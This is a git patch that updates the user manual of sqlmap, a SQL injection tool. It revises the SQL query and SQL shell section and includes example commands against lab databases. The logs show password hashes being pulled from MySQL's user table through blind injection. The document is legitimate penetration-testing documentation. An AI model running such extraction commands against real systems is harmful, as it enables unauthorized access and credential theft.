From 77d9d22cebf96ba3a0252b19235af58ee259a558 Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Sun, 1 Feb 2009 00:20:08 +0000 Subject: [PATCH] Minor update to the user's manual --- doc/README.html | 151 ++++++++++++++++++++++++------------------------ doc/README.pdf | Bin 335523 -> 335968 bytes doc/README.sgml | 149 ++++++++++++++++++++++++----------------------- 3 files changed, 150 insertions(+), 150 deletions(-) diff --git a/doc/README.html b/doc/README.html index 57559d99c..7723435a2 100644 --- a/doc/README.html +++ b/doc/README.html @@ -3455,8 +3455,14 @@ as a users' database.

Options: --sql-query and --sql-shell

The SQL query and the SQL shell features makes the user able to run -whatever SELECT statement on the web application's back-end -database management system and retrieve its output.

+custom SQL statement on the web application's back-end database management. +sqlmap automatically recognize the type of SQL statement provided and +choose which SQL injection technique to use to execute it: if it is a +SELECT statement it will retrieve its output through the blind SQL +injection or UNION query SQL injection technique depending on the user's +options, otherwise it will execute the query through the stacked query +SQL injection technique if the web application supports multiple +statements on the back-end database management system.

Examples on a Microsoft SQL Server 2000 Service Pack 0 target:

@@ -3495,9 +3501,9 @@ SELECT 'foo', 'bar': 'foo, bar'

As you can see from this last example, sqlmap splits the query in two different SELECT statement to be able to retrieve the output even -when using blind SQL injection technique. -Otherwise in inband SQL injection technique it only perform a single HTTP -request to get the user's query output:

+when using the blind SQL injection technique. +Otherwise in UNION query SQL injection technique it only performs a single +HTTP request to get the user's query output:

@@ -3524,24 +3530,12 @@ SELECT 'foo', 'bar' [1]:

-

Examples on an Oracle XE 10.2.0.1 target:

-

-

-
-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --sql-query \
-  "SELECT 'foo' FROM dual" -v 0
-
-[hh:mm:04] [INPUT] does the SQL query that you provide might return multiple entries? [Y/n] n
-SELECT 'foo' FROM dual:    'foo'
-
-
-

- -

As you can see, if your SELECT statement contains a FROM -clause, sqlmap asks the user if such statement can return multiple entries -and in such case the tool knows how to unpack the query correctly to -retrieve its whole output line per line when going through blind SQL -injection technique.

+

If your SELECT statement contains a FROM clause, sqlmap +asks the user if such statement can return multiple entries and in such +case the tool knows how to unpack the query correctly to retrieve its +whole output entry per entry when going through blind SQL injection +technique. Through UNION query SQL injection it retrieved the whole output +in a single response.

Example on a PostgreSQL 8.3.5 target:

@@ -3550,9 +3544,9 @@ injection technique.

$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --sql-query \ "SELECT usename FROM pg_user" -v 0 -[hh:mm:47] [INPUT] does the SQL query that you provide might return multiple entries? [Y/n] y -[hh:mm:48] [INPUT] the SQL query that you provide can return up to 3 entries. How many -entries do you want to retrieve? +[hh:mm:32] [INPUT] can the SQL query provided return multiple entries? [Y/n] y +[hh:mm:37] [INPUT] the SQL query provided can return up to 2 entries. How many entries +do you want to retrieve? [a] All (default) [#] Specific number [q] Quit @@ -3564,72 +3558,62 @@ SELECT usename FROM pg_user [2]:

-

As you can see from the last example, sqlmap counts the number of entries -for your query and asks how many entries from the top you want to dump. +

As you can see from the last example, sqlmap counted the number of entries +for your query and asks how many entries you want to dump. Otherwise if you specify also the LIMIT, or similar, clause -sqlmap will not ask anything, just unpack the query and return its -output line per line when going through blind SQL injection technique.

+sqlmap will not ask anything, it just unpacks the query and return its +output entry per entry when going through blind SQL injection technique. +Through UNION query SQL injection it retrieved the whole output in a +single response.

Example on a MySQL 5.0.67 target:

 $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --sql-query \
-  "SELECT user, host, password FROM mysql.user LIMIT 1, 3" -v 1
+  "SELECT host, password FROM mysql.user LIMIT 1, 3" -v 1
 
 [...]
 back-end DBMS:  MySQL >= 5.0.0
 
-[hh:mm:11] [INFO] fetching SQL SELECT query output: 'SELECT user, host, password FROM 
+[hh:mm:22] [INFO] fetching SQL SELECT statement query output: 'SELECT host, password FROM 
 mysql.user LIMIT 1, 3'
-[hh:mm:12] [INFO] the SQL query provided has more than a field. sqlmap will now unpack 
-it into distinct queries to be able to retrieve the output even if we are going blind
-[hh:mm:12] [INFO] query: SELECT IFNULL(CAST(user AS CHAR(10000)), CHAR(32)) FROM mysql.user 
-ORDER BY user ASC LIMIT 1, 1
-[hh:mm:12] [INFO] retrieved: root
-[hh:mm:12] [INFO] performed 34 queries in 0 seconds
-[hh:mm:12] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM mysql.user 
-ORDER BY user ASC LIMIT 1, 1
-[hh:mm:12] [INFO] retrieved: localhost
-[hh:mm:12] [INFO] performed 69 queries in 0 seconds
-[hh:mm:12] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM mysql.user 
-ORDER BY user ASC LIMIT 1, 1
-[hh:mm:12] [INFO] retrieved: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
-[hh:mm:13] [INFO] performed 293 queries in 0 seconds
-[hh:mm:13] [INFO] query: SELECT IFNULL(CAST(user AS CHAR(10000)), CHAR(32)) FROM mysql.user 
-ORDER BY user ASC LIMIT 2, 1
-[hh:mm:13] [INFO] retrieved: root
-[hh:mm:13] [INFO] performed 34 queries in 0 seconds
-[hh:mm:13] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM mysql.user 
-ORDER BY user ASC LIMIT 2, 1
-[hh:mm:13] [INFO] retrieved: leboyer
-[hh:mm:13] [INFO] performed 55 queries in 0 seconds
-[hh:mm:13] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM mysql.user 
-ORDER BY user ASC LIMIT 2, 1
-[hh:mm:13] [INFO] retrieved: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
-[hh:mm:14] [INFO] performed 293 queries in 0 seconds
-[hh:mm:14] [INFO] query: SELECT IFNULL(CAST(user AS CHAR(10000)), CHAR(32)) FROM mysql.user 
-ORDER BY user ASC LIMIT 3, 1
-[hh:mm:14] [INFO] retrieved: root
-[hh:mm:14] [INFO] performed 34 queries in 0 seconds
-[hh:mm:14] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM mysql.user 
-ORDER BY user ASC LIMIT 3, 1
-[hh:mm:14] [INFO] retrieved: 192.168.1.121
-[hh:mm:14] [INFO] performed 69 queries in 0 seconds
-[hh:mm:14] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM mysql.user 
-ORDER BY user ASC LIMIT 3, 1
-[hh:mm:14] [INFO] retrieved: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
-[hh:mm:15] [INFO] performed 293 queries in 0 seconds
-SELECT user, host, password FROM mysql.user LIMIT 1, 3 [3]:
-[*] root, localhost, *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
-[*] root, leboyer, *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
-[*] root, 192.168.1.121, *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
+[hh:mm:22] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it 
+into distinct queries to be able to retrieve the output even if we are going blind
+[hh:mm:22] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM 
+mysql.user LIMIT 1, 1
+[hh:mm:22] [INFO] retrieved: localhost
+[hh:mm:22] [INFO] performed 69 queries in 0 seconds
+[hh:mm:22] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM 
+mysql.user LIMIT 1, 1
+[hh:mm:22] [INFO] retrieved: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
+[hh:mm:24] [INFO] performed 293 queries in 2 seconds
+[hh:mm:24] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM 
+mysql.user LIMIT 2, 1
+[hh:mm:24] [INFO] retrieved: localhost
+[hh:mm:25] [INFO] performed 69 queries in 0 seconds
+[hh:mm:25] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) FROM 
+mysql.user LIMIT 2, 1
+[hh:mm:25] [INFO] retrieved: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
+[hh:mm:27] [INFO] performed 293 queries in 2 seconds
+[hh:mm:27] [INFO] query: SELECT IFNULL(CAST(host AS CHAR(10000)), CHAR(32)) FROM 
+mysql.user LIMIT 3, 1
+[hh:mm:27] [INFO] retrieved: localhost
+[hh:mm:28] [INFO] performed 69 queries in 0 seconds
+[hh:mm:28] [INFO] query: SELECT IFNULL(CAST(password AS CHAR(10000)), CHAR(32)) 
+FROM mysql.user LIMIT 3, 1
+[hh:mm:28] [INFO] retrieved: 
+[hh:mm:28] [INFO] performed 6 queries in 0 seconds
+SELECT host, password FROM mysql.user LIMIT 1, 3 [3]:
+[*] localhost, *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
+[*] localhost, *00E247AC5F9AF26AE0194B41E1E769DEE1429A29
+[*] localhost,

The SQL shell option gives you access to run your own SQL statement -interactively, like a SQL console logged into the back-end database +interactively, like a SQL console logged to the back-end database management system. This feature has TAB completion and history support.

@@ -3804,6 +3788,23 @@ an asterisk instead of the column(s) name, sqlmap first retrieves the column names of the table then asks if the query can return multiple entries and goes on.

+

Example of SQL statement other than SELECT on an Oracle XE +10.2.0.1 target:

+

+

+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" --sql-shell -v 1
+
+[...]
+back-end DBMS: Oracle
+
+[hh:mm:20] [INFO] calling Oracle shell. To quit type 'x' or 'q' and press ENTER
+sql> TODO
+
+
+

+ +

5.8 File system access

diff --git a/doc/README.pdf b/doc/README.pdf index db70225c61b1bbfa8e77f10f1fc65ed02a8000d4..191c544b14e753376bd4c1809ea790a1bb3a093a 100644 GIT binary patch delta 23812 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 